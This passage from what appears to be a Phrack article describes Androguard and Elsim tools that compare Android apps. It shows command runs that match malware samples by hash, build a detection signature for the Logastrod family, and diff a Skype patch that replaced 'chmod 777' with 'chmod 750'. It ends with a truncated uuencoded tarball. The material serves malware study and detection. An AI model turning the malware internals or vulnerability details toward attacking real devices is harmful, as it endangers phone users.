SKIPPED methods: ######################################################################### Basically we are able to determine if two samples are from the same malware family. If they are, the analyst can start his analysis from the similar methods. In the next part we will see how we can see the differences (what instructions have been modified) between two similar methods. If we test the tool by using two different samples (like opfake and foncy) we observe the following: ######################################################################### d@t0t0:~/androguard$ ./androsim.py -i apks/malwares/opfake/\ b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311 apks/malwares/foncy/\ 01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5 Elements: IDENTICAL: 1 SIMILAR: 0 NEW: 2 DELETED: 38 SKIPPED: 0 --> methods: 33.333333% of similarities ######################################################################### We see a strange similarity score due to the fact that all methods, including those of small size, have been compared. We can skip the specific case of methods having a small size using the "-s" option (to filter according to the size of the method in bytes): ######################################################################### d@t0t0:~/androguard$ ./androsim.py -i apks/malwares/opfake/\ b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311 apks/malwares/foncy/\ 01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5 -s 10 Elements: IDENTICAL: 0 SIMILAR: 0 NEW: 2 DELETED: 29 SKIPPED: 33 --> methods: 0.000000% of similarities ######################################################################### We can do a lot of things with this kind of tool such as: - detecting plagiarism between two android applications - checking if an application is correctly protected with an obfuscator - extracting easily injected codes (if you know the original application) There are many other interesting "ways" to use this tool such as discovering if malware samples have been written by the same author, or if some pieces of code have been reused. Analyzing the "faketoken" [7] sample and the "opfake.d" sample we have observed an interesting result. The first sample "faketoken" is detected by 19/43 antivirus products on VirusTotal [8]. The second sample "opfake.d" is detected by 16/41 antivirus products on VirusTotal [9]. All of these antivirus products are using different names with the exception of DrWeb. Now if we run our tool we observe the following output: ######################################################################### d@t0t0:~/androguard$ ./androsim.py -i apks/plagiarism/opfake/\ f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79 apks/plagiarism/opfake/\ 61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac Elements: IDENTICAL: 951 SIMILAR: 5 NEW: 34 DELETED: 23 SKIPPED: 0 --> methods: 96.516954% of similarities ######################################################################### We can skip specific libraries common to these samples such as "Lorg/simpleframework/xml" and methods of small sizes. This provides us with an even more interesting result: ######################################################################### d@t0t0:~/androguard$ ./androsim.py -i apks/plagiarism/opfake/\ f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79 apks/plagiarism/opfake/\ 61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac -e "Lorg/simpleframework/" -s 100 -d Elements: IDENTICAL: 9 SIMILAR: 3 NEW: 14 DELETED: 11 SKIPPED: 5260 --> methods: 44.998713% of similarities SIMILAR methods: Ltoken/bot/MainApplication; loadStartSettings (Ljava/lang/String;)Ltoken/bot/StartSettings; 230 --> Lcom/load/wap/MainApplication; loadStartSettings (Ljava/lang/String;)Lcom/load/wap/StartSettings; 190 0.375 Ltoken/bot/MainService; threadOperationRun (I Ljava/lang/Object;)V 197 --> Lcom/load/wap/MainService; threadOperationRun (I Ljava/lang/Object;)V 122 0.319999992847 Ltoken/bot/ServerResponse; ()V 133 --> Lcom/load/wap/ServerResponse; ()V 125 0.214285716414 IDENTICAL methods: Ltoken/bot/Settings; isDeleteMessage (Ljava/lang/String; Ljava/lang/String;)Z 132 --> Lcom/load/wap/Settings; isDeleteMessage (Ljava/lang/String; Ljava/lang/String;)Z 132 Ltoken/bot/UpdateActivity; setMainScreen ()V 107 --> Lcom/load/wap/UpdateActivity; setMainScreen ()V 107 Ltoken/bot/MainApplication; sendGetRequest (Ljava/lang/String; Ljava/util/List;)V 132 --> Lcom/load/wap/MainApplication; sendGetRequest (Ljava/lang/String; Ljava/util/List;)V 132 Ltoken/bot/MainService; onStart (Landroid/content/Intent; I)V 106 --> Lcom/load/wap/MainService; onStart (Landroid/content/Intent; I)V 106 Ltoken/bot/MainApplication; sendPostRequest (Ljava/lang/String; Ljava/util/List;)V 197 --> Lcom/load/wap/MainApplication; sendPostRequest (Ljava/lang/String; Ljava/util/List;)V 197 Ltoken/bot/MainApplication; DownloadApk (Ljava/lang/String; Ljava/lang/String;)Z 106 --> Lcom/load/wap/MainApplication; DownloadApk (Ljava/lang/String; Ljava/lang/String;)Z 106 Ltoken/bot/Settings; isCatchMessage (Ljava/lang/String; Ljava/lang/String;)Ltoken/bot/CatchResult; 165 --> Lcom/load/wap/Settings; isCatchMessage (Ljava/lang/String; Ljava/lang/String;) Lcom/load/wap/CatchResult; 165 Ltoken/bot/MainApplication; getContacts (Landroid/content/Context;)Ljava/util/Vector; 230 --> Lcom/load/wap/MainApplication; getContacts (Landroid/content/Context;)Ljava/util/Vector; 230 Ltoken/bot/MainApplication; dateFromString (Ljava/lang/String;)Ljava/util/Date; 103 --> Lcom/load/wap/MainApplication; dateFromString (Ljava/lang/String;)Ljava/util/Date; 103 ######################################################################### As we can see, the names of the methods are "exactly" the same, and the signatures (the bytecodes with a high probability) are the same. It can be really interesting to detect if your software has been ripped off by someone. ----[ 3.2 Differences between two applications Up to this point, we have a tool which is able to recognize similar methods, but we would like more information about the differences between each method. For that we will apply the same algorithm but we will change the "granularity" and focus on basic blocks in order to extract differences. However, in this specific case, we will not use our classical signature for each basic block but rather a simple "string" which represents the sequence of instructions. So, finally, as in the previous algorithm, we will have: - identical basic blocs - similar basic blocs - new basic blocs - deleted basic blocs With the list of similar basic blocks, we can apply a standard "diff" algorithm between each similar basic blocks to know which instructions have been added or removed. The Longuest Common Subsequence (LCS) algorithm [11] can then be used to obtain all differences. In order to apply the LCS algorithm, we will map each unique instruction to a simple string: ADD 3 -> "\00" ADD 1 -> "\01" MOV 3 -> "\02" ADD 3 -> "\00" If we have two basic blocks, we must translate each basic block into a final string: ADD 3 ADD 1 SUB 2 IGET => "\x00\x01\x02\x03\x00\x04" ADD 3 GOTO ADD 3 ADD 3 SUB 2 IGET => "\x00\x00\x02\x03\x05\x04" MUL 4 GOTO The application of the LCS algorithm[11] between these two strings reveals the instructions that have been added or removed: ######################################################################### In [5]: from elsim_dalvik.py import LCS In [7]: a = "\x00\x01\x02\x03\x00\x04" In [9]: b = "\x00\x00\x02\x03\x05\x04" In [10]: z = LCS(a, b) In [12]: from elsim_dalvik import getDiff In [13]: l_a = [] In [14]: l_r = [] In [15]: getDiff(z, a, b, len(a), len(b), l_a, l_r) In [16]: l_a Out[16]: [(1, '\x00'), (4, '\x05')] // "ADD 3" and "MUL 4" have been added in the second basic bloc In [17]: l_r Out[18]: [(1, '\x01'), (4, '\x00')] // ""ADD 1" and "ADD 3" have been remove in the first basic bloc ######################################################################### Although it's also possible to use a better algorithm such as the Needleman algorithm [10] (used in biology for "sequence alignment" [12], or in the comparison of network traces [35]), the tests performed have demonstrated that the LCS algorithm was sufficient. Now, we have a new tool called "androdiff.py" which can be used to extract and observe differences between two Android applications. We have tested it against two versions of the Skype application to analyze the patch of a security vulnerability [13] (mainly due to incorrect use of file permissions): ######################################################################### d@t0t0:~/androguard$ ./androsim.py -i elsim/examples/android/com.skype.raider_1.0.0.831.apk elsim/examples/android/com.skype.raider_1.0.0.983.apk -c BZ2 Elements: IDENTICAL: 2059 SIMILAR: 167 NEW: 27 DELETED: 0 SKIPPED: 0 --> methods: 98.192539% of similarities ######################################################################### We have several methods to analyze, but only a few new methods are present, and two of them are particularly interesting: ######################################################################### Lcom/skype/ipc/SkypeKitRunner; chmod (Ljava/io/File; Ljava/lang/String;)Z 61 Lcom/skype/ipc/SkypeKitRunner; fixPermissions ([Ljava/io/File;)V 47 ######################################################################### So we can now search in the similar methods where these new methods are called: ######################################################################### d@t0t0:~/androguard$ ./androdiff.py -i elsim/examples/android/com.skype.raider_1.0.0.831.apk elsim/examples/android/com.skype.raider_1.0.0.983.apk -d [...] [ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ] <-> [ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ] run-BB@0xae run-BB@0xae Added Elements(2) 0xba 3 invoke-virtual v8 , [ meth@ 5897 Ljava/security/MessageDigest; reset ['()', 'V'] ] 0xc0 4 sget-object v9 , [ field@ 1299 Lcom/skype/ipc/SkypeKitRunner; [B MAITSEAINE ] Deleted Elements(0) run-BB@0x320 run-BB@0x316 Added Elements(1) 0x332 5 const/4 v8 , [ #+ 0 ] // {0} Deleted Elements(1) 0x328 5 const/4 v8 , [ #+ 3 ] // {3} run-BB@0x352 run-BB@0x348 Added Elements(1) 0x364 4 const-string v5 , [ string@ 2921 'chmod 750 ' ] Deleted Elements(1) 0x35a 4 const-string v5 , [ string@ 2904 'chmod 777 ' ] run-BB@0x52c run-BB@0x522 Added Elements(10) 0x59e 29 invoke-virtual v4 , [ meth@ 109 Landroid/content/Context; getFilesDir ['()', 'Ljava/io/File;'] ] 0x5a4 30 move-result-object v4 0x5a6 31 invoke-virtual v4 , [ meth@ 5719 Ljava/io/File; getAbsolutePath ['()', 'Ljava/lang/String;'] ] 0x5ac 32 move-result-object v4 0x5be 37 move-object/from16 v0 , v19 0x5c2 38 iget-object v0 , v0 , [ field@ 1314 Lcom/skype/ipc/SkypeKitRunner; Landroid/content/Context; mContext ] 0x5c6 39 move-object v4 , v0 0x5d8 44 move-object/from16 v0 , v19 0x5dc 45 move-object v1 , v4 0x5de 46 invoke-direct v0 , v1 , [ meth@ 1923 Lcom/skype/ipc/SkypeKitRunner; fixPermissions ['([Ljava/io/File;)', 'V'] ] Deleted Elements(0) [...] ######################################################################### As you can see, some constants are changed (3 to 0, 777 to 750) to patch an incorrect use of file permissions (you need to take the original CFG to view the details (maybe in a new version we will see the results in one CFG)). A new method is called to fix the existing permissions of the files. ----[ 3.3 Looking for a signature in applications Now, if you wish to detect if a specific method (or a class) is present in another application, you need to check all methods of this application with your method. Moreover, if we have a database of signatures, we must check if each signature is present in our application. For example, if your database is composed of 1000 signatures, and our application contains 1000 methods we will need to perform: - 1000 * 1000 -> 1.000.000 of comparisons to know the result That's why we need another solution and we will use the second algorithm (2.2). In this algorithm we need a set of float values to perform the clustering. So, in this example, we will use different sources of entropies. We have already described the generic algorithm (2.2), so we only need to define our element in this implementation. An element (in fact a part of our signature) will be composed of: - a string which represents the method (or the class) (in fact it is a signature obtained by the grammar (3.1)) - a set of entropies (float values) The most important part is the set of entropies. We have used different sources of entropies to have better results. An Android application provides an important amount of information. One of them is the API that is used (the Android/Java API). Another one is the exceptions because they define very well a method. We can also use the entropy of the signature and the bytecode. Maybe we have redundancy by using these entropies (due to the fact that the entropy of the signature is composed of both the Android/Java packages and the exceptions), so we need to work more on this subject but this problem will not produce false positives. We will also define a simple JSON file that we will use to generate our signature in order to extract information like the entropies and to add it in a database. We take the "logastrod" [14] malware and we create the signature after the analysis of this malware in order to find where are the most interesting malicious parts: ######################################################################### d@t0t0:~/androguard$ cat signatures/logastrod.sign [ { "SAMPLE" : "apks/malwares/logastrod/ \ f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983" }, { "BASE" : "AndroidOS", "NAME" : "Logastrod", "SIGNATURE" : [ { "TYPE" : "METHSIM", "CN" : "Lcom/pavel/newmodule/RuleActivity;", "MN" : "onCreate", "D" : "(Landroid/os/Bundle;)V" }, { "TYPE" : "METHSIM", "CN" : "Lcom/pavel/newmodule/LicenseActivity;", "MN" : "onCreate", "D" : "(Landroid/os/Bundle;)V" } ], "BF" : "a && b" } ] ######################################################################### The name of this signature is "Logastrod" and we need to recognize the two methods (the boolean formula) to make a positive match. By using the "androcsign.py" tool we can extract the entropies and signatures of the methods from the specified sample, and add it to our database: ######################################################################### d@t0t0:~/androguard$ ./androcsign.py -i signatures/logastrod.sign -d signatures/dbandroguard [{u'Logastrod': [[[0, 'Qlt[...]kdd', 4.809434597538392, 4.584117420715886, 4.538809415871831, 0.0]], u'a && b' ]}] ######################################################################### Now it is possible to use "androsign.py" to check a particular file or an entire directory by using a database of signatures. "f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9" is a sample of this "logastrod" malware: ######################################################################### d@t0t0:~/androguard$ ./androsign.py -i apks/malwares/logastrod/f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36 659cb809f13d9 -b signatures/dbandroguard -c signatures/dbconfig -v [SIGN:69 CLUSTERS:10 CMP_CLUSTERS:8 ELEMENTS:31 CMP_ELEMENTS:39 -> 2139 1.823282%] [[91, 92, 0.27931034564971924], [91, 93, 0.18803419172763824]] ----> Logastrod ######################################################################### As you can see, we have only done "39" comparisons thanks to the clustering. Without this method, "2139" comparisons would have been required for the same result. ######################################################################### d@t0t0:~/androguard$ ./androsign.py -d apks/malwares/logastrod/ -b signatures/dbandroguard -c signatures/dbconfig f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 : ----> Logastrod a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 : ----> Logastrod 77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de : ----> Logastrod fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f : ----> Logastrod f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 : ----> Logastrod e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 : ----> Logastrod ######################################################################### We can see that on VirusTotal all these samples are not detected identically by few AV products: ######################################################################### f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 : 22/43 antivirus a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 : 19/43 antivirus 77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de : 22/43 antivirus fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f : 21/43 antivirus f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 : 19/43 antivirus e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 : 21/43 antivirus ######################################################################### We maintain an Open Source Database of Android Malware [15] where you can find analysis links and a few signatures for Android malware. The main difficulty is to create a signature because you must choose carefully which method/class you wish to add to the database in order to avoid as much as possible false positives. In other terms, don't add a method/class from a free/proprietary "API" or project in a malware database :) You can use this tool to check if your application has been stolen by someone else using a multiple file analysis. Imagine that you have created an uber open source && l33t algorithm and you wish to know if your algorithm has been ripped off and included in a proprietary software. Of course, it is possible to build databases of many "things", from a cryptographic functions database to a DNA database... --[ 4 - Conclusion The similarity is a difficult problem but it is possible to achieve an interesting result by using the NCD and the entropy with "normalized" data. So, at the end of this paper, you will find two tools. The first one is Androguard in the first stable 1.0 version. Androguard is a known framework in Python to manipulate, reverse engineer, and play with Android applications. The stable version we release with this paper brings a lot of new things (especially the stability of the similarities tools) and a few tips and tricks to reverse engineer Android Apps (such as dealing with non-ASCII names). In this framework, several tools are using the new open source software Elsim to search the similarities/dissimilarities in different sets of elements. We have described two kinds of "generic" algorithms. The first one can be used if you wish to find the similarities between two sets of elements. The second one can be used if you have a database of signatures and you need a quick engine to search the signatures in a set of elements. Finally we described a new algorithm of entropy ("Descriptional entropy") which can be used to classify and obtain more information from an element and two new algorithms which can help you to answer to a similarity "problem". But Elsim is not limited to Android applications, and the tool will be improved in the next months to support x86 and ARM binaries in order to have an open source software with such capabilities. Many thanks to the Phrack staff for the suggestions on how to improve this work. "Talk is cheap. Show me the code". Torvalds, Linus" --[ 5 - References [1] Androguard. http://code.google.com/p/androguard/ [2] Silvio Cesare (2010). "Classification of malware using structured control flow". [3] MacQueen, J. B. (1967). "Some Methods for classification and Analysis of Multivariate Observations". [4] Android source code (dalvik). http://source.android.com/ [5] Foncy Android Malware. http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#foncy [6] Opfake Android Malware. http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#opfake_\ (all) [7] Faketoken Android Malware. http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#faketoken [8] https://www.virustotal.com/file/\ f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79/analysis/ [9] https://www.virustotal.com/file/\ 61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac/analysis/ [10] Needleman, Saul B and Wunsch, Christian D. (1970). "A general method applicable to the search for similarities in the amino acid sequence of two proteins" [11] L. Bergroth and H. Hakonen and T. Raita (2000). "A Survey of Longest Common Subsequence Algorithms". [12] Sequence Alignement. http://en.wikipedia.org/wiki/Sequence_alignment [13] Android Police. http://www.androidpolice.com/2011/04/14/\ exclusive-vulnerability-in-skype-for-android-is-exposing-your-name\ -phone-number-chat-logs-and-a-lot-more/. [14] Logastrod Android Malware. http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#Logastrod [15] Opensource Database of Android Malware. http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares [16] Manuel Cebrian, Manuel Alfonseca and Alfonso Ortega. "Common Pitfalls Using Normalized Compression Distance: What to Watch Out for in a Compressor" [17] R. Cilibrasi and P. M. B. Vitanyi. "Clustering by compression" [18] Kolmogorov A. N (1965). "Three Approaches for Defining the Concept of Information Quantity" [19] Snappy compressor. http://code.google.com/p/snappy/ [20] Cilibrasi, R. & Vitanyi, P. (2005). "Clustering by compression" [21] Dullien, T. & Rolles, R. (2005). "Graph-based comparison of executable objects" [22] M. Li and P. Vitanyi (1997). "An introduction to Kolmogorov Complexity and Its Applications" [23] D. Sankoff and J. Kruskal (1983, 1989). "Time warps, string edits and macromolecules" [24] J. Shallit, M.-W. Wang. "Automatic Complexity of Strings". [25] T. Sabin. "Comparing binaries with graph isomorphisms". http://razor.bindview.com/publish/papers/comparingbinaries.html [26] Wikipedia: http://en.wikipedia.org/wiki/Kolmogorov_complexity [27] Jesus Freke. http://code.google.com/p/smali/ [28] http://en.wikipedia.org/wiki/Cluster_analysis [29] A. D. Danaksok and F. G. Gologlu, On Lempel-Ziv. "Complexity of Sequences" [30] Lempel, A., Ziv, J. "On the complexity of finite sequences" [31] S. Janson, S. Lonardi and W. Szpankowski. "On average sequence complexity" [32] J. Shallit. "On the maximum number of distinct factors in a binary string" [33] http://www.c-sharpcorner.com/uploadfile/acinonyx72/calculating\ -the-normalized-compression-distance-between-two-strings/$ [34] SMILES http://en.wikipedia.org/wiki/Simplified_molecular-input_line-entry_system [35] Netzob http://www.netzob.org/ --[ 6 - Code begin 664 androguard-1.0.tar.gz M'XL("'KQ>T\``V%N9')O9W5A:[!HQ MT]?T]!S=,R-4O6<:@XEJ]DJ2(&[_]!Q)A%2K5?!3JE7$\*>7?I*D6KE:JXF5 M,L!)9;$F_D0JSR)-+$TL6S4)^:E'+=VPTN$6E;_0I$;;WZ:6;:W;"E9I?[E6 MA?97Y+*2M?\F4F+[X]^VI0UT8?RX!AX+VK]2%N58^U>K$O1_<0V\%Z8?O/VW M?MZ>6.9V1].WJ7Y/QH_VC:'G+9!(QXVS#)R.AI M_4<@`ED3O4=-8M]08E-S9*'P^.7#Z2=R3"W@2#Y0G9KJD)Q/.D.M2XZU+M4M M2E2H+>98-[1'.D@-\8Y0D)8K"#DR@+QJ:X;.$ZI!N4GNJ6G!=U+V.+GT>&*8 M0(.#ZH/T)C'&B%8$D1_)4+4#S*3J![6$KSHC>V.,H4HW0`XJ^:"!&CN43"S: MGPQYP`=8\F?S\O>S3Y>D7EZV&J1H[,+TB#GC8O+YOZGX\8% M.?]T<7[6.A0(:5$4B@+^8@7W64N!%GO45K6AY53\*S2M!0(.>^1&O:?0Q%VJ M@540E73!R)9N/R"E#@U]P.H;ME="FGVB&S9/+!#VUQO;'N]N;S\\/`@#?2(8 MYF![Z%"PMM\)N1QHQP";MQZM7.Z\V\SDH$,:J?2.H MXS'5>UP8IIC+]4UC1(*Q5>A"A07G.ZC?)1Y(UWH"1@J".GRTP'1MN7./`'Y-F`T!VJH&E+Z-%I/I?K46@"@.(& MJ$0Z'=,NV&5Q-T<@:7T"V61OSR]P\C&-3=K7IL"U0,X^D@++IT.+)D*0+R[$ MV-1TFQ1>64AXE\"G3QF^%,@KPCEH/-C*V$2IBNZC+QLT1$X%LB&U<2101#&' M/#T5"9]/&NXC1U1A0.WV_8@#FEVC1]L>U-ZE.:$$6QC-F$*?8EW3@7>^6UR1 M[(;JX.0R`*;1MJZ.*!(.%21DP;C9-;6Q;9A<,40M7WI'=LE?=IXGTQ!3-EVK M]L2DG)/!HU:AS5A!N)JMYH?3QN6GB\/VL=@6BXP&#C/ZX!GY2!OB(V^(3WE# M?)0$/ENK,LH?*P#T/_8)*/"@FH/)B.JVA=^O\L?N*)"_)G_#O_7PE/,Q0B3W M-%)1/2ULAG727XOZY]"O/#-]L7V=TOT_ M3;?6X_XM\/\D69'B_G]5*=%A#6E,ST%*F*4FOJ]<4??DE\U7;/?$:[X.9]"`)(X%:&0RVL,J=33P-#L M/.')U57AOL!+U_A8P$7);P6>*#PI'-^J]^KV4-4'VV>=6X!^"P4%KHA_/^,? MAV_A^KJ8H%F'IQKF>:^9]D0=Y@.>R!(>Q!CS'>0^K\I,D":3I(E_@B(I39R_ M^=SJF@W1)<"O.5>_RORZ$K>RLO\4JW9%Y!?4FO!0:Y)8;_F9ZBT3QG'--2^G MZD!:KNE)BAK*SZ2&,G%Y?H,BB&_O1/:?ROZ3XC^)UQ&5R,NK)%DIRC,I12$^ MU_EJH0EJV8:Y=T`#Y8A^]9=54R6JIO(J:DI65.69%%4A(;[S526)SZ@K?*I& MM::LIK5DO56?26]5$N&\0'/R1C2'3[6H#BNKZC!9B[5GTF*-Q'@OT&-UPWK$ MIWI4H]75-9JLT_HSZ;1.9KC/UZK3K4>384G3[20]AK4W9T&EA.ELRVJO9R91 M4^;18&,,4#&I/3'U,'J*KN)YH+R_-[HO$MX8^AKTZ&-BGZP.A5:KTINLFL MCW(B/XNFCU7-M,(RLSKW^\`90%7;-KDX$D_R`&!1^U4O#YH%'L4(=B`ETBG& MM3%UZN/IIB1=.XKOWM#N':?RY%X=3J@OTS*[2ICNZ"/(G+*S1-Z0//Q[,[O! ME%02V6?R&4##(0]PF%$01\B8WKJ&;FOZA.9"]LIBOON_'^Y_;)Y^(((@Y/FU M[7\Y/'LT5G'("0%TNE",>:RPTXW4J8<5*/@ZIE-,=$A'(&<(Z`KPKF<' M:H"0_.X:-/`KBQGJ/%%<;!FPD=L5N!\^(LN0$MBQ00YY,J.5B[,0/3I<(#8J MX(TG\I#J`_L&6RCG-T4XIN&H9F8#5W-[F=.%"/0A)_!PI5T35Z@E]G5)>--N M^L/N(J3'_[O]0;O36<<6`$;YJU4E+?XOBC4I%O^OB4HUB_]O(J7$_U]`^#,1 MO/-H4QS]+>'V?N3AO+]HG.[_+K?_^'S2/CO?/SLX;/$8?:;F2-/I*9W:L>,Q M0<22Q?XN][<-4QO`YZ'`9K!".-9)\I`?"SY>)2P?P9?HM[7N:.PX$))435YF MQN%VTL!@66<@1$FJIX%$EEH`*LO@J:02C$,K-5A!PSJJ#-YQN;98#+F8KAUAW#M;3QQ$*U**)(OI/U_H/DSR(%GK19I.#ID0*> M=(!?]\:3K>/HPJ\9\V<91$CXCL\:UDA=8S36AI0Y4I[#E,4=-AAWN%\A"K'> M$`3RNF6\$N(.H/I;8:1"7^/")(ODYSUR:N@T`0530KCB_CH1DHU]>1B$G$`# MYX8>>"_D@#TH*(U6RQ]^B@EQ!T>I;_:(E%C4,:EZMU0<`ON;5*%O_;1,KB?UG\+PTZB_\EN?%/DC2+_V7QOR0QLOC?CR-_%O_SI,WB M?UG\+XO_A>TQB_]E\;\L_I?%_[+X7Y8VFM+C?_;CF*[G#0`+WO]6DY3RS/D_ M6HYU_Y#(>Y$C`5W\KT`7ML)J!RC MQK!#1RZ)[3,RES!S2/'[^$GQ/45.BGV5DK/%Q*MJ:R$AB"E$D@M$89V$PAE. M+#RTMY!R_:_1M;5[S7Y\RWRJ`P.Z`$5%%R**+E7"]$M*Z+D<>@ZIJB0%SR'4 M4&X(.$0C1+H24DVI\B.SKU8JY5`1?JU$OU:C7VLAY#(LA';XR-=Z]&LM^K7Z M@W,&OM6=2JB!TC.BT@HQ`2OQC&H\HR94XE*'09C<\8Q:/*,JS-C*/T*22*>) MM5\IUH"XY:=4JK7ZCO\@5+RT.EA5K);K2JTLSJ+NB!5I1ZS7)#%D766AXC]? M;_HNKI.W@7>4+O6FT6>-.D4C3N[L%&@F&FY:[SM/Y\9=TV*NX7AK4G35$WPK M%EQUH_9+1U1!+WFHO&7GD4%D]R(:UP(A1JH-K>U3\?=.9HL20K9]I)]`)'9= M-5#__`KPR_+&Q+H3Z5_A"P[<>Y;,&JZ%L3'F1'\'P5/\;%3U>[NX69J3TN,_ M,'+9]B/X9`_?&@2:?_Y++%?DV/L?95&L9>>_-I*R]S]F\9\L_O,2W_^8!.T! M><<@4\\USHL3!?&'JSEQGOU&),(3B6/,P3I\2^A_)]!L7).$WJS88B]V?EN< MSHC M;J5BVDO11RAI.3!Y.;`R`\,M/;>MT2*Z5OP%\.Z"0-/Q_?:PB-7!2V$+,;J7 M-SMYSUU1T?D$,Q(:7TZ.S['U**P:`$N`I5[/?\>[:T]@L:9%G6U%F-G&N#IY M/^GW.=_]<=='YXU6Z_``%D::LQV$V^9[KJ0"DR9O4LNI,,D_X)^)W2_5\T4? M7G@P-1M\*XN$\KI#PZ+_L`-1Z>,_JK!MJ??TFR>!!>=_*K5:?/RO5:5R-OYO M(LT?_V]4ZV:H=;YU/EAU$^C?.?)CG6[HM#<9C3G+[/+$<3CWZCQ&@O9$MW8P MM&"DR@_G]+2!9N.!424646,T)KJ&`U.159+(T0#0U(]L`2N$+WI,BX$^D#04 M76F[VANG,'#;05STM3H%4A!N#4WGKO*OQ-=?F&/NR(7GFWK:P/SV3RY@:WN3J%OW170H>+.U.W+[^>'[(X M#3Z@[T,PO,"^'+`O,G2.OJ-?Z`2J.;AG04O)G<+"1'P2;XA'(,A>Z0$=&9*S7?I>M>B^-KZAIK-K&ETDI**!>[DJ_'_V#1W;=B6\YONA MT;U[@H!AQ-986PGWW,3(G*U1ZS_2$Q%70KN@`SQ*^+@2TB=;&ZZ$\"=5[S[2 MQ\-IE[)3CJL@MTLVX6&.PO06_:C0YZ@85W8'/#69)'< M\'*5R8;3C[OASY;!CD3>4G$KRL_EM>7T6$60,RG:L1[AI)&/4J'+(J M"CC):P,LQ"DG4BQ'BR,_0N5R]09^Y!%HXS:R60`ZP2"K.N6PKAW)F=>YCEP, M9DM''[>@#X2.1E@QQD_>[1$7.R&D[[I">([X[(B\E\AO\'G4.KR$J3JT_W#+ MW\Y>&4D*M(<9RDLPE+^=84>ZNKW&78N.C`^I+-\??FB>1MDAJ]M4$2^:'\@N MR:>4>TL\9$]*1-Z%FL/J`S0\=8W_F/.?Z?5).K,^<_Q.SWGS>2EKC_ M96NC]5V`#BYP07;7T/O)SN'#"/[S8`_^?'_&L[_[>"HMY!X:G2[>Y^["8,F3 MJ3>NF#C>=[K"/36U_F,;;X*WOW!D&AEN\8CI=/=5CUC&<(++%6O7.;#-N039 MR7!G8)VZ`ZS)3@KD6H?[%X>X1LXW3@\NSCY\:EP`W$P]BIEZO`NJY4 MRWAY09(4L0:?%5&I5."S7J[7*@KFUW>0T(XBR56@7ZG+M0H0WZG6G4^ENJ.4 MPX0ER!!1'J"GX%48193P7I(L*HH(HM2ERDX5\JME@(/\FE*OU$!XJ2P!42IAPE6F*(755,8"T(*!A]FQN3GBJ)HG?^`U7Z==VNQZ_UY@00(L M;67,!'-@)TX=.`XFPZ"IH:%+I7?$O@'_[L88]K#E'W==GY'$$#V;8JQXK]3' M10`W[]$Y/&*P<]^^A7*AXB1T1+'17+!KX;$00"F&CL"X=APW<5<E[_N_KO?^'XGYW_VTC*?O\KN_B;!IU=_$VZO_[^!NVQ^SB;W;Q-[OXFUW\S2[^ M9FFC:<[^#YUNY/U_HE*5Y7C\3RDK6?QO$RDQ_B<+U6@(T/"V@>9=UV5EQMAF MURR]PC-V%.0>\AKDM,N^P@',<_G0.5RAI!9X4 M2B5-'T_L`DQ[A1LZ'&-9@661GF:"6V28CPBGJ^;`PD*)_.V2Q.-T5Q[UZW_O M24;&J`TV@9=I^Q.]ZU8)RQY,;$J3>PWJ"9TT#'8\\`\7.=@')4C$00DPY!0, MMYJE=^25*-3[Q*D99\LE6P+Y2=RW`@[A.KD"YG*_A:O!ZH7G1'#HXTSUP5O6 MX6$+L"WA@)UZ^7QRQ'XW`7PI]2%ZC-`]N8IGF3C7''@"-9J,J&Y;X96D::`Y M@#$!`)XZL7!=9%C"@SK$W2,'5W!,+KRZ!(MQP']&KV_V9R;THAE2&)]HG'],TXF75.^&^OG')82- M<5.QJN!8:;TVXK.@R)$:G!";E]PE_U&C>''Y9I$>'/CO%%:L)OA#`/]&52J/G8C/A0CTW*<5?`["2 MZB@[_DC\4Y`PZ,^IVC>WDCNUV:;:I1VU>Y<*Z$,(SI@'OW1]EF&?A M;LPS/J:#*"YA]M'&!8%;%?_P-;BN>P$&*TN=(8#19M=_L?7_B7I'L2G7RF/! M^2^Q7*[$UO]*I9R]_V$C:?_`L>\]U\Z[O=S%233+')$23-8YH07=_O1R-Y=3 MAT.8)PDY;KYOY7+X%[KH_W5[H87W-BZ\M_UU^O90Z\`2BOSR"]C^'67`,-9H M04ZN.Z2JOB(=PI!FJ;GYWUNY+R#%^K^E#705UK*@Z?7Q6.#_8_I_]J[T*9%D MV]\_I:/C?K@3<]]4[LN;>!\*=UM41%O;CHF)W`K0@J)95/K>^=]?)J"-(%"" M71,SS0E#K24KLRKS=[8\>7(*_Q11]H]W].V:,)]^.XY(_O2[6+DX/CV#]/G$91 